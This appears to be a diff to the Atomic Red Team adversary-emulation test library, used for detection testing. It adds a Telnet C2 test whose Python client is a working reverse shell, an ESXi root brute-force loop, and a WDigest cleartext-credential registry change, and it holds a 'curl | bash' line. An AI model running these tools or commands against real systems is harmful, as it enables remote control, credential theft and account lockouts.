+##### Description: Command and Control (C2) server cam be established by running PathToAtomicsFolder\T1071\bin\telnet_server.exe on specified server with specified IP that must be reachable by client (telnet_client.exe)
+##### Check Prereq Commands:
+```powershell
+$connection = Test-NetConnection -ComputerName #{server_ip} -Port #{server_port}
+if ($connection.TcpTestSucceeded) {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+Write-Host "Setup C2 server manually"
+```
+
+
+
+
+<br/>
@@ -0,0 +1,35 @@
+attack_technique: T1071
+display_name: 'Application Layer Protocol'
+atomic_tests:
+- name: Telnet C2
+  auto_generated_guid: 3b0df731-030c-4768-b492-2a3216d90e53
+  description: |
+    An adversary may establish telnet communication from compromised endpoint to command and control (C2) server to be able to operate more attack on objectives.
+  supported_platforms:
+  - windows
+  dependency_executor_name: powershell
+  dependencies:
+  - description: |
+      Command and Control (C2) server cam be established by running PathToAtomicsFolder\T1071\bin\telnet_server.exe on specified server with specified IP that must be reachable by client (telnet_client.exe)
+    prereq_command: |
+      $connection = Test-NetConnection -ComputerName #{server_ip} -Port #{server_port}
+      if ($connection.TcpTestSucceeded) {exit 0} else {exit 1}
+    get_prereq_command: |
+      Write-Host "Setup C2 server manually"
+  input_arguments:
+    server_ip:
+      description: C2 server IP or URL
+      type: url
+      default: 127.0.0.1  # Replace "example.com" with the actual IP or URL
+    client_path:
+      description: Client agent path
+      type: url
+      default: PathToAtomicsFolder\T1071\bin\telnet_client.exe  # Update the path if needed
+    server_port:
+      description: C2 server port
+      type: Integer
+      default: 23
+  executor:
+    command: |
+      #{client_path} #{server_ip} --port #{server_port}
+    name: powershell
@@ -0,0 +1,44 @@
+import argparse
+import asyncio
+import telnetlib3
+
+async def shell(reader, writer):
+    while True:
+        # Read command from the server
+        command = await reader.read(1024)
+        if not command:
+            # End of File
+            break
+
+        # Execute the command using asyncio.create_subprocess_shell
+        process = await asyncio.create_subprocess_shell(command,
+                                                        stdout=asyncio.subprocess.PIPE,
+                                                        stderr=asyncio.subprocess.PIPE)
+        output, error = await process.communicate()
+        print(f"Receive command: {command}")
+
+        # Check if output is empty
+        if not output:
+            result = b"ok"
+        else:
+            result = output
+
+        # Send the result back to the server
+        writer.write(result.decode())
+
+        # Flush the writer to ensure data is sent immediately
+        await writer.drain()
+
+def main(server_ip, port):
+    loop = asyncio.get_event_loop()
+    coro = telnetlib3.open_connection(server_ip, port, shell=shell)
+    reader, writer = loop.run_until_complete(coro)
+    loop.run_until_complete(writer.protocol.waiter_closed)
+
+if __name__ == "__main__":
+    parser = argparse.ArgumentParser(description="Telnet client")
+    parser.add_argument("server_ip", help="IP address of the server")
+    parser.add_argument("--port", type=int, default=23, help="Port number (default: 23)")
+    args = parser.parse_args()
+
+    main(args.server_ip, args.port)
@@ -0,0 +1,92 @@
+import argparse
+import socket
+
+def main(host, port):
+    # Create a socket object
+    server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+
+    # Bind the socket to the host and port
+    server_socket.bind((host, port))
+
+    # Listen for incoming connections
+    server_socket.listen(1)
+
+    print('Server listening on {}:{}'.format(host, port))
+
+    while True:
+        try:
+            # Accept incoming connections
+            client_socket, client_address = server_socket.accept()
+            print('Connection established with {}:{}'.format(client_address[0], client_address[1]))
+
+            # Send Telnet negotiation
+            client_socket.sendall(b"\xFF\xFB\x01")  # Telnet WILL option 01 (echo)
+            client_socket.sendall(b"\xFF\xFD\x03")  # Telnet DO option 03 (suppress go ahead)
+
+            # Send a blank string immediately after the client connects
+            client_socket.sendall(b"")
+
+            command = ""
+            client_socket.sendall(command.encode())
+
+            # Receive output from the client
+            output = client_socket.recv(65536)
+                
+            # Print output (decode if it's command data)
+            try:
+                print("Output from client:", output.decode())
+            except UnicodeDecodeError:
+                print("Output from client:", output)
+
+            command = ""
+            client_socket.sendall(command.encode())
+
+            # Receive output from the client
+            output = client_socket.recv(65536)
+                
+            # Print output (decode if it's command data)
+            try:
+                print("Output from client:", output.decode())
+            except UnicodeDecodeError:
+                print("Output from client:", output)
+
+            while True:
+                while True:
+                    command = input("Enter command to execute on client: ")
+                    if command.strip():
+                        break
+                    else:
+                        print("Command cannot be empty. Please try again.")
+
+                # Send command to the client
+                client_socket.sendall(command.encode())
+
+                # Check for exit command
+                if command.lower() == "exit":
+                    break
+
+                # Receive output from the client
+                output = client_socket.recv(65536)
+
+                # Print output (decode if it's command data)
+                try:
+                    print("Output from client:", output.decode())
+                except UnicodeDecodeError:
+                    print("Output from client:", output)
+
+            # Close the connection
+            client_socket.close()
+        except ConnectionAbortedError:
+            print("Connection aborted by the client.")
+            continue
+        except ConnectionResetError:
+            print("Connection reset by the client.")
+            continue
+
+if __name__ == "__main__":
+    parser = argparse.ArgumentParser(description="Telnet server")
+    parser.add_argument("host", help="Host IP address")
+    parser.add_argument("--port", type=int, default=23, help="Port number (default: 23)")
+    args = parser.parse_args()
+
+    main(args.host, args.port)
@@ -40,6 +40,8 @@ In default environments, LDAP and Kerberos connection attempts are less likely t

 - [Atomic Test #7 - SUDO Brute Force - FreeBSD](#atomic-test-7---sudo-brute-force---freebsd)

+- [Atomic Test #8 - ESXi - Brute Force Until Account Lockout](#atomic-test-8---esxi---brute-force-until-account-lockout)
+

 <br/>

@@ -430,4 +432,56 @@ pkg update && pkg install -y sudo curl bash



+<br/>
+<br/>
+
+## Atomic Test #8 - ESXi - Brute Force Until Account Lockout
+An adversary may attempt to brute force the password of privilleged account for privilege escalation.
+In the process, the TA may lock the account, which can be used for detection. [Reference](https://news.sophos.com/en-us/2022/07/14/blackcat-ransomware-attacks-not-merely-a-byproduct-of-bad-luck/#:~:text=A%20ransomware%20group%20attacking%20large,internal%20systems%20after%20establishing%20a)
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** ed6c2c87-bba6-4a28-ac6e-c8af3d6c2ab5
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| vm_host | Specify the host name of the ESXi Server | string | atomic.local|
+| plink_file | Path to Putty | path | PathToAtomicsFolder&#92;..&#92;ExternalPayloads&#92;plink.exe|
+| lockout_threshold | Specify the account lockout threshold configured on the ESXI management server | string | 5|
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+$lockout_threshold = [int]"#{lockout_threshold}"
+for ($var = 1; $var -le $lockout_threshold; $var++) {
+  #{plink_file} -ssh "#{vm_host}" -l root -pw f0b443ae-9565-11ee-b9d1-0242ac120002
+  }
+```
+
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: The plink executable must be found in the ExternalPayloads folder.
+##### Check Prereq Commands:
+```powershell
+if (Test-Path "#{plink_file}") {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
+Invoke-WebRequest "https://the.earth.li/~sgtatham/putty/latest/w64/plink.exe" -OutFile "#{plink_file}"
+```
+
+
+
+
 <br/>
@@ -263,4 +263,40 @@ atomic_tests:
      curl -s #{remote_url} |bash
    cleanup_command: |
      rmuser -y art
-
+- name: ESXi - Brute Force Until Account Lockout
+  auto_generated_guid: ed6c2c87-bba6-4a28-ac6e-c8af3d6c2ab5
+  description: |
+    An adversary may attempt to brute force the password of privilleged account for privilege escalation.
+    In the process, the TA may lock the account, which can be used for detection. [Reference](https://news.sophos.com/en-us/2022/07/14/blackcat-ransomware-attacks-not-merely-a-byproduct-of-bad-luck/#:~:text=A%20ransomware%20group%20attacking%20large,internal%20systems%20after%20establishing%20a)
+  supported_platforms:
+  - windows
+  input_arguments:
+    vm_host:
+      description: Specify the host name of the ESXi Server
+      type: string
+      default: atomic.local
+    plink_file:
+      description: Path to Putty
+      type: path
+      default: 'PathToAtomicsFolder\..\ExternalPayloads\plink.exe'
+    lockout_threshold:
+      description: Specify the account lockout threshold configured on the ESXI management server
+      type: string
+      default: "5"
+  dependency_executor_name: powershell
+  dependencies:
+  - description: |
+      The plink executable must be found in the ExternalPayloads folder.
+    prereq_command: |
+      if (Test-Path "#{plink_file}") {exit 0} else {exit 1}
+    get_prereq_command: |
+      New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
+      Invoke-WebRequest "https://the.earth.li/~sgtatham/putty/latest/w64/plink.exe" -OutFile "#{plink_file}"
+  executor:
+    command: |
+      $lockout_threshold = [int]"#{lockout_threshold}"
+      for ($var = 1; $var -le $lockout_threshold; $var++) {
+        #{plink_file} -ssh "#{vm_host}" -l root -pw f0b443ae-9565-11ee-b9d1-0242ac120002
+        }
+    name: powershell
+    elevation_required: false
@@ -16,135 +16,137 @@ The Registry of a remote system may be modified to aid in execution of files as

 - [Atomic Test #3 - Modify registry to store logon credentials](#atomic-test-3---modify-registry-to-store-logon-credentials)

- [Atomic Test #4 - Add domain to Trusted sites Zone](#atomic-test-4---add-domain-to-trusted-sites-zone)
+- [Atomic Test #4 - Use Powershell to Modify registry to store logon credentials](#atomic-test-4---use-powershell-to-modify-registry-to-store-logon-credentials)

- [Atomic Test #5 - Javascript in registry](#atomic-test-5---javascript-in-registry)
+- [Atomic Test #5 - Add domain to Trusted sites Zone](#atomic-test-5---add-domain-to-trusted-sites-zone)

- [Atomic Test #6 - Change Powershell Execution Policy to Bypass](#atomic-test-6---change-powershell-execution-policy-to-bypass)
+- [Atomic Test #6 - Javascript in registry](#atomic-test-6---javascript-in-registry)

- [Atomic Test #7 - BlackByte Ransomware Registry Changes - CMD](#atomic-test-7---blackbyte-ransomware-registry-changes---cmd)
+- [Atomic Test #7 - Change Powershell Execution Policy to Bypass](#atomic-test-7---change-powershell-execution-policy-to-bypass)

- [Atomic Test #8 - BlackByte Ransomware Registry Changes - Powershell](#atomic-test-8---blackbyte-ransomware-registry-changes---powershell)
+- [Atomic Test #8 - BlackByte Ransomware Registry Changes - CMD](#atomic-test-8---blackbyte-ransomware-registry-changes---cmd)

- [Atomic Test #9 - Disable Windows Registry Tool](#atomic-test-9---disable-windows-registry-tool)
+- [Atomic Test #9 - BlackByte Ransomware Registry Changes - Powershell](#atomic-test-9---blackbyte-ransomware-registry-changes---powershell)

- [Atomic Test #10 - Disable Windows CMD application](#atomic-test-10---disable-windows-cmd-application)
+- [Atomic Test #10 - Disable Windows Registry Tool](#atomic-test-10---disable-windows-registry-tool)

- [Atomic Test #11 - Disable Windows Task Manager application](#atomic-test-11---disable-windows-task-manager-application)
+- [Atomic Test #11 - Disable Windows CMD application](#atomic-test-11---disable-windows-cmd-application)

- [Atomic Test #12 - Disable Windows Notification Center](#atomic-test-12---disable-windows-notification-center)
+- [Atomic Test #12 - Disable Windows Task Manager application](#atomic-test-12---disable-windows-task-manager-application)

- [Atomic Test #13 - Disable Windows Shutdown Button](#atomic-test-13---disable-windows-shutdown-button)
+- [Atomic Test #13 - Disable Windows Notification Center](#atomic-test-13---disable-windows-notification-center)

- [Atomic Test #14 - Disable Windows LogOff Button](#atomic-test-14---disable-windows-logoff-button)
+- [Atomic Test #14 - Disable Windows Shutdown Button](#atomic-test-14---disable-windows-shutdown-button)

- [Atomic Test #15 - Disable Windows Change Password Feature](#atomic-test-15---disable-windows-change-password-feature)
+- [Atomic Test #15 - Disable Windows LogOff Button](#atomic-test-15---disable-windows-logoff-button)

- [Atomic Test #16 - Disable Windows Lock Workstation Feature](#atomic-test-16---disable-windows-lock-workstation-feature)
+- [Atomic Test #16 - Disable Windows Change Password Feature](#atomic-test-16---disable-windows-change-password-feature)

- [Atomic Test #17 - Activate Windows NoDesktop Group Policy Feature](#atomic-test-17---activate-windows-nodesktop-group-policy-feature)
+- [Atomic Test #17 - Disable Windows Lock Workstation Feature](#atomic-test-17---disable-windows-lock-workstation-feature)

- [Atomic Test #18 - Activate Windows NoRun Group Policy Feature](#atomic-test-18---activate-windows-norun-group-policy-feature)
+- [Atomic Test #18 - Activate Windows NoDesktop Group Policy Feature](#atomic-test-18---activate-windows-nodesktop-group-policy-feature)

- [Atomic Test #19 - Activate Windows NoFind Group Policy Feature](#atomic-test-19---activate-windows-nofind-group-policy-feature)
+- [Atomic Test #19 - Activate Windows NoRun Group Policy Feature](#atomic-test-19---activate-windows-norun-group-policy-feature)

- [Atomic Test #20 - Activate Windows NoControlPanel Group Policy Feature](#atomic-test-20---activate-windows-nocontrolpanel-group-policy-feature)
+- [Atomic Test #20 - Activate Windows NoFind Group Policy Feature](#atomic-test-20---activate-windows-nofind-group-policy-feature)

- [Atomic Test #21 - Activate Windows NoFileMenu Group Policy Feature](#atomic-test-21---activate-windows-nofilemenu-group-policy-feature)
+- [Atomic Test #21 - Activate Windows NoControlPanel Group Policy Feature](#atomic-test-21---activate-windows-nocontrolpanel-group-policy-feature)

- [Atomic Test #22 - Activate Windows NoClose Group Policy Feature](#atomic-test-22---activate-windows-noclose-group-policy-feature)
+- [Atomic Test #22 - Activate Windows NoFileMenu Group Policy Feature](#atomic-test-22---activate-windows-nofilemenu-group-policy-feature)

- [Atomic Test #23 - Activate Windows NoSetTaskbar Group Policy Feature](#atomic-test-23---activate-windows-nosettaskbar-group-policy-feature)
+- [Atomic Test #23 - Activate Windows NoClose Group Policy Feature](#atomic-test-23---activate-windows-noclose-group-policy-feature)

- [Atomic Test #24 - Activate Windows NoTrayContextMenu Group Policy Feature](#atomic-test-24---activate-windows-notraycontextmenu-group-policy-feature)
+- [Atomic Test #24 - Activate Windows NoSetTaskbar Group Policy Feature](#atomic-test-24---activate-windows-nosettaskbar-group-policy-feature)

- [Atomic Test #25 - Activate Windows NoPropertiesMyDocuments Group Policy Feature](#atomic-test-25---activate-windows-nopropertiesmydocuments-group-policy-feature)
+- [Atomic Test #25 - Activate Windows NoTrayContextMenu Group Policy Feature](#atomic-test-25---activate-windows-notraycontextmenu-group-policy-feature)

- [Atomic Test #26 - Hide Windows Clock Group Policy Feature](#atomic-test-26---hide-windows-clock-group-policy-feature)
+- [Atomic Test #26 - Activate Windows NoPropertiesMyDocuments Group Policy Feature](#atomic-test-26---activate-windows-nopropertiesmydocuments-group-policy-feature)

- [Atomic Test #27 - Windows HideSCAHealth Group Policy Feature](#atomic-test-27---windows-hidescahealth-group-policy-feature)
+- [Atomic Test #27 - Hide Windows Clock Group Policy Feature](#atomic-test-27---hide-windows-clock-group-policy-feature)

- [Atomic Test #28 - Windows HideSCANetwork Group Policy Feature](#atomic-test-28---windows-hidescanetwork-group-policy-feature)
+- [Atomic Test #28 - Windows HideSCAHealth Group Policy Feature](#atomic-test-28---windows-hidescahealth-group-policy-feature)

- [Atomic Test #29 - Windows HideSCAPower Group Policy Feature](#atomic-test-29---windows-hidescapower-group-policy-feature)
+- [Atomic Test #29 - Windows HideSCANetwork Group Policy Feature](#atomic-test-29---windows-hidescanetwork-group-policy-feature)

- [Atomic Test #30 - Windows HideSCAVolume Group Policy Feature](#atomic-test-30---windows-hidescavolume-group-policy-feature)
+- [Atomic Test #30 - Windows HideSCAPower Group Policy Feature](#atomic-test-30---windows-hidescapower-group-policy-feature)

- [Atomic Test #31 - Windows Modify Show Compress Color And Info Tip Registry](#atomic-test-31---windows-modify-show-compress-color-and-info-tip-registry)
+- [Atomic Test #31 - Windows HideSCAVolume Group Policy Feature](#atomic-test-31---windows-hidescavolume-group-policy-feature)

- [Atomic Test #32 - Windows Powershell Logging Disabled](#atomic-test-32---windows-powershell-logging-disabled)
+- [Atomic Test #32 - Windows Modify Show Compress Color And Info Tip Registry](#atomic-test-32---windows-modify-show-compress-color-and-info-tip-registry)

- [Atomic Test #33 - Windows Add Registry Value to Load Service in Safe Mode without Network](#atomic-test-33---windows-add-registry-value-to-load-service-in-safe-mode-without-network)
+- [Atomic Test #33 - Windows Powershell Logging Disabled](#atomic-test-33---windows-powershell-logging-disabled)

- [Atomic Test #34 - Windows Add Registry Value to Load Service in Safe Mode with Network](#atomic-test-34---windows-add-registry-value-to-load-service-in-safe-mode-with-network)
+- [Atomic Test #34 - Windows Add Registry Value to Load Service in Safe Mode without Network](#atomic-test-34---windows-add-registry-value-to-load-service-in-safe-mode-without-network)

- [Atomic Test #35 - Disable Windows Toast Notifications](#atomic-test-35---disable-windows-toast-notifications)
+- [Atomic Test #35 - Windows Add Registry Value to Load Service in Safe Mode with Network](#atomic-test-35---windows-add-registry-value-to-load-service-in-safe-mode-with-network)

- [Atomic Test #36 - Disable Windows Security Center Notifications](#atomic-test-36---disable-windows-security-center-notifications)
+- [Atomic Test #36 - Disable Windows Toast Notifications](#atomic-test-36---disable-windows-toast-notifications)

- [Atomic Test #37 - Suppress Win Defender Notifications](#atomic-test-37---suppress-win-defender-notifications)
+- [Atomic Test #37 - Disable Windows Security Center Notifications](#atomic-test-37---disable-windows-security-center-notifications)

- [Atomic Test #38 - Allow RDP Remote Assistance Feature](#atomic-test-38---allow-rdp-remote-assistance-feature)
+- [Atomic Test #38 - Suppress Win Defender Notifications](#atomic-test-38---suppress-win-defender-notifications)

- [Atomic Test #39 - NetWire RAT Registry Key Creation](#atomic-test-39---netwire-rat-registry-key-creation)
+- [Atomic Test #39 - Allow RDP Remote Assistance Feature](#atomic-test-39---allow-rdp-remote-assistance-feature)

- [Atomic Test #40 - Ursnif Malware Registry Key Creation](#atomic-test-40---ursnif-malware-registry-key-creation)
+- [Atomic Test #40 - NetWire RAT Registry Key Creation](#atomic-test-40---netwire-rat-registry-key-creation)

- [Atomic Test #41 - Terminal Server Client Connection History Cleared](#atomic-test-41---terminal-server-client-connection-history-cleared)
+- [Atomic Test #41 - Ursnif Malware Registry Key Creation](#atomic-test-41---ursnif-malware-registry-key-creation)

- [Atomic Test #42 - Disable Windows Error Reporting Settings](#atomic-test-42---disable-windows-error-reporting-settings)
+- [Atomic Test #42 - Terminal Server Client Connection History Cleared](#atomic-test-42---terminal-server-client-connection-history-cleared)

- [Atomic Test #43 - DisallowRun Execution Of Certain Applications](#atomic-test-43---disallowrun-execution-of-certain-applications)
+- [Atomic Test #43 - Disable Windows Error Reporting Settings](#atomic-test-43---disable-windows-error-reporting-settings)

- [Atomic Test #44 - Enabling Restricted Admin Mode via Command_Prompt](#atomic-test-44---enabling-restricted-admin-mode-via-command_prompt)
+- [Atomic Test #44 - DisallowRun Execution Of Certain Applications](#atomic-test-44---disallowrun-execution-of-certain-applications)

- [Atomic Test #45 - Mimic Ransomware - Enable Multiple User Sessions](#atomic-test-45---mimic-ransomware---enable-multiple-user-sessions)
+- [Atomic Test #45 - Enabling Restricted Admin Mode via Command_Prompt](#atomic-test-45---enabling-restricted-admin-mode-via-command_prompt)

- [Atomic Test #46 - Mimic Ransomware - Allow Multiple RDP Sessions per User](#atomic-test-46---mimic-ransomware---allow-multiple-rdp-sessions-per-user)
+- [Atomic Test #46 - Mimic Ransomware - Enable Multiple User Sessions](#atomic-test-46---mimic-ransomware---enable-multiple-user-sessions)

- [Atomic Test #47 - Event Viewer Registry Modification - Redirection URL](#atomic-test-47---event-viewer-registry-modification---redirection-url)
+- [Atomic Test #47 - Mimic Ransomware - Allow Multiple RDP Sessions per User](#atomic-test-47---mimic-ransomware---allow-multiple-rdp-sessions-per-user)

- [Atomic Test #48 - Event Viewer Registry Modification - Redirection Program](#atomic-test-48---event-viewer-registry-modification---redirection-program)
+- [Atomic Test #48 - Event Viewer Registry Modification - Redirection URL](#atomic-test-48---event-viewer-registry-modification---redirection-url)

- [Atomic Test #49 - Enabling Remote Desktop Protocol via Remote Registry](#atomic-test-49---enabling-remote-desktop-protocol-via-remote-registry)
+- [Atomic Test #49 - Event Viewer Registry Modification - Redirection Program](#atomic-test-49---event-viewer-registry-modification---redirection-program)

- [Atomic Test #50 - Disable Win Defender Notification](#atomic-test-50---disable-win-defender-notification)
+- [Atomic Test #50 - Enabling Remote Desktop Protocol via Remote Registry](#atomic-test-50---enabling-remote-desktop-protocol-via-remote-registry)

- [Atomic Test #51 - Disable Windows OS Auto Update](#atomic-test-51---disable-windows-os-auto-update)
+- [Atomic Test #51 - Disable Win Defender Notification](#atomic-test-51---disable-win-defender-notification)

- [Atomic Test #52 - Disable Windows Auto Reboot for current logon user](#atomic-test-52---disable-windows-auto-reboot-for-current-logon-user)
+- [Atomic Test #52 - Disable Windows OS Auto Update](#atomic-test-52---disable-windows-os-auto-update)

- [Atomic Test #53 - Windows Auto Update Option to Notify before download](#atomic-test-53---windows-auto-update-option-to-notify-before-download)
+- [Atomic Test #53 - Disable Windows Auto Reboot for current logon user](#atomic-test-53---disable-windows-auto-reboot-for-current-logon-user)

- [Atomic Test #54 - Do Not Connect To Win Update](#atomic-test-54---do-not-connect-to-win-update)
+- [Atomic Test #54 - Windows Auto Update Option to Notify before download](#atomic-test-54---windows-auto-update-option-to-notify-before-download)

- [Atomic Test #55 - Tamper Win Defender Protection](#atomic-test-55---tamper-win-defender-protection)
+- [Atomic Test #55 - Do Not Connect To Win Update](#atomic-test-55---do-not-connect-to-win-update)

- [Atomic Test #56 - Snake Malware Registry Blob](#atomic-test-56---snake-malware-registry-blob)
+- [Atomic Test #56 - Tamper Win Defender Protection](#atomic-test-56---tamper-win-defender-protection)

- [Atomic Test #57 - Allow Simultaneous Download Registry](#atomic-test-57---allow-simultaneous-download-registry)
+- [Atomic Test #57 - Snake Malware Registry Blob](#atomic-test-57---snake-malware-registry-blob)

- [Atomic Test #58 - Modify Internet Zone Protocol Defaults in Current User Registry - cmd](#atomic-test-58---modify-internet-zone-protocol-defaults-in-current-user-registry---cmd)
+- [Atomic Test #58 - Allow Simultaneous Download Registry](#atomic-test-58---allow-simultaneous-download-registry)

- [Atomic Test #59 - Modify Internet Zone Protocol Defaults in Current User Registry - PowerShell](#atomic-test-59---modify-internet-zone-protocol-defaults-in-current-user-registry---powershell)
+- [Atomic Test #59 - Modify Internet Zone Protocol Defaults in Current User Registry - cmd](#atomic-test-59---modify-internet-zone-protocol-defaults-in-current-user-registry---cmd)

- [Atomic Test #60 - Activities To Disable Secondary Authentication Detected By Modified Registry Value.](#atomic-test-60---activities-to-disable-secondary-authentication-detected-by-modified-registry-value)
+- [Atomic Test #60 - Modify Internet Zone Protocol Defaults in Current User Registry - PowerShell](#atomic-test-60---modify-internet-zone-protocol-defaults-in-current-user-registry---powershell)

- [Atomic Test #61 - Activities To Disable Microsoft [FIDO Aka Fast IDentity Online] Authentication Detected By Modified Registry Value.](#atomic-test-61---activities-to-disable-microsoft-fido-aka-fast-identity-online-authentication-detected-by-modified-registry-value)
+- [Atomic Test #61 - Activities To Disable Secondary Authentication Detected By Modified Registry Value.](#atomic-test-61---activities-to-disable-secondary-authentication-detected-by-modified-registry-value)

- [Atomic Test #62 - Scarab Ransomware Defense Evasion Activities](#atomic-test-62---scarab-ransomware-defense-evasion-activities)
+- [Atomic Test #62 - Activities To Disable Microsoft [FIDO Aka Fast IDentity Online] Authentication Detected By Modified Registry Value.](#atomic-test-62---activities-to-disable-microsoft-fido-aka-fast-identity-online-authentication-detected-by-modified-registry-value)

- [Atomic Test #63 - Disable Remote Desktop Anti-Alias Setting Through Registry](#atomic-test-63---disable-remote-desktop-anti-alias-setting-through-registry)
+- [Atomic Test #63 - Scarab Ransomware Defense Evasion Activities](#atomic-test-63---scarab-ransomware-defense-evasion-activities)

- [Atomic Test #64 - Disable Remote Desktop Security Settings Through Registry](#atomic-test-64---disable-remote-desktop-security-settings-through-registry)
+- [Atomic Test #64 - Disable Remote Desktop Anti-Alias Setting Through Registry](#atomic-test-64---disable-remote-desktop-anti-alias-setting-through-registry)

- [Atomic Test #65 - Disabling ShowUI Settings of Windows Error Reporting (WER)](#atomic-test-65---disabling-showui-settings-of-windows-error-reporting-wer)
+- [Atomic Test #65 - Disable Remote Desktop Security Settings Through Registry](#atomic-test-65---disable-remote-desktop-security-settings-through-registry)

- [Atomic Test #66 - Enable Proxy Settings](#atomic-test-66---enable-proxy-settings)
+- [Atomic Test #66 - Disabling ShowUI Settings of Windows Error Reporting (WER)](#atomic-test-66---disabling-showui-settings-of-windows-error-reporting-wer)

- [Atomic Test #67 - Set-Up Proxy Server](#atomic-test-67---set-up-proxy-server)
+- [Atomic Test #67 - Enable Proxy Settings](#atomic-test-67---enable-proxy-settings)

- [Atomic Test #68 - RDP Authentication Level Override](#atomic-test-68---rdp-authentication-level-override)
+- [Atomic Test #68 - Set-Up Proxy Server](#atomic-test-68---set-up-proxy-server)
+
+- [Atomic Test #69 - RDP Authentication Level Override](#atomic-test-69---rdp-authentication-level-override)


 <br/>
@@ -255,7 +257,40 @@ reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLo
 <br/>
 <br/>

-## Atomic Test #4 - Add domain to Trusted sites Zone
+## Atomic Test #4 - Use Powershell to Modify registry to store logon credentials
+Sets registry key using Powershell that will tell windows to store plaintext passwords (making the system vulnerable to clear text / cleartext password dumping).
+Open Registry Editor to view the modified entry in HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 68254a85-aa42-4312-a695-38b7276307f8
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
+
+
+```powershell
+Set-ItemProperty -Force -Path  'HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest' -Name  'UseLogonCredential' -Value '1' -ErrorAction Ignore
+```
+
+#### Cleanup Commands:
+```powershell
+Set-ItemProperty -Force -Path  'HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest' -Name  'UseLogonCredential' -Value '0' -ErrorAction Ignore
+```
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #5 - Add domain to Trusted sites Zone
 Attackers may add a domain to the trusted site zone to bypass defenses. Doing this enables attacks such as c2 over office365.
 Upon execution, details of the new registry entries will be displayed.
 Additionally, open Registry Editor to view the modified entry in HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\.
@@ -302,7 +337,7 @@ Remove-item  $key -Recurse -ErrorAction Ignore
 <br/>
 <br/>

-## Atomic Test #5 - Javascript in registry
+## Atomic Test #6 - Javascript in registry
 Upon execution, a javascript block will be placed in the registry for persistence.
 Additionally, open Registry Editor to view the modified entry in HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings.

@@ -335,7 +370,7 @@ Remove-ItemProperty "HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Se
 <br/>
 <br/>

-## Atomic Test #6 - Change Powershell Execution Policy to Bypass
+## Atomic Test #7 - Change Powershell Execution Policy to Bypass
 Attackers need to change the powershell execution policy in order to run their malicious powershell scripts.
 They can either specify it during the execution of the powershell script or change the registry value for it.

@@ -373,7 +408,7 @@ try { Set-ExecutionPolicy -ExecutionPolicy #{default_execution_policy} -Scope Lo
 <br/>
 <br/>

-## Atomic Test #7 - BlackByte Ransomware Registry Changes - CMD
+## Atomic Test #8 - BlackByte Ransomware Registry Changes - CMD
 This task recreates the steps taken by BlackByte ransomware before it worms to other machines.  See "Preparing to Worm" section: https://redcanary.com/blog/blackbyte-ransomware/
 The steps are as follows:
 <ol>
@@ -416,7 +451,7 @@ reg delete HKLM\SYSTEM\CurrentControlSet\Control\FileSystem\ /v LongPathsEnabled
 <br/>
 <br/>

-## Atomic Test #8 - BlackByte Ransomware Registry Changes - Powershell
+## Atomic Test #9 - BlackByte Ransomware Registry Changes - Powershell
 This task recreates the steps taken by BlackByte ransomware before it worms to other machines via Powershell.  See "Preparing to Worm" section: https://redcanary.com/blog/blackbyte-ransomware/
 The steps are as follows:
 <ol>
@@ -459,7 +494,7 @@ Remove-ItemProperty "HKLM:\SYSTEM\CurrentControlSet\Control\FileSystem" -Name Lo
 <br/>
 <br/>

-## Atomic Test #9 - Disable Windows Registry Tool
+## Atomic Test #10 - Disable Windows Registry Tool
 Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows registry tool to prevent user modifying registry entry.
 See example how Agent Tesla malware abuses this technique: https://any.run/report/ea4ea08407d4ee72e009103a3b77e5a09412b722fdef67315ea63f22011152af/a866d7b1-c236-4f26-a391-5ae32213dfc4#registry

@@ -492,7 +527,7 @@ powershell Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVe
 <br/>
 <br/>

-## Atomic Test #10 - Disable Windows CMD application
+## Atomic Test #11 - Disable Windows CMD application
 Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows CMD application.
 See example how Agent Tesla malware abuses this technique: https://any.run/report/ea4ea08407d4ee72e009103a3b77e5a09412b722fdef67315ea63f22011152af/a866d7b1-c236-4f26-a391-5ae32213dfc4#registry

@@ -525,7 +560,7 @@ Remove-ItemProperty -Path "HKCU:\Software\Policies\Microsoft\Windows\System" -Na
 <br/>
 <br/>

-## Atomic Test #11 - Disable Windows Task Manager application
+## Atomic Test #12 - Disable Windows Task Manager application
 Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows task manager application.
 See example how Agent Tesla malware abuses this technique: https://any.run/report/ea4ea08407d4ee72e009103a3b77e5a09412b722fdef67315ea63f22011152af/a866d7b1-c236-4f26-a391-5ae32213dfc4#registry

@@ -558,7 +593,7 @@ reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies
 <br/>
 <br/>

-## Atomic Test #12 - Disable Windows Notification Center
+## Atomic Test #13 - Disable Windows Notification Center
 Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows notification center.
 See how remcos rat abuses this technique- https://tccontre.blogspot.com/2020/01/remcos-rat-evading-windows-defender-av.html

@@ -591,7 +626,7 @@ reg delete HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Explorer /v Dis
 <br/>
 <br/>

-## Atomic Test #13 - Disable Windows Shutdown Button
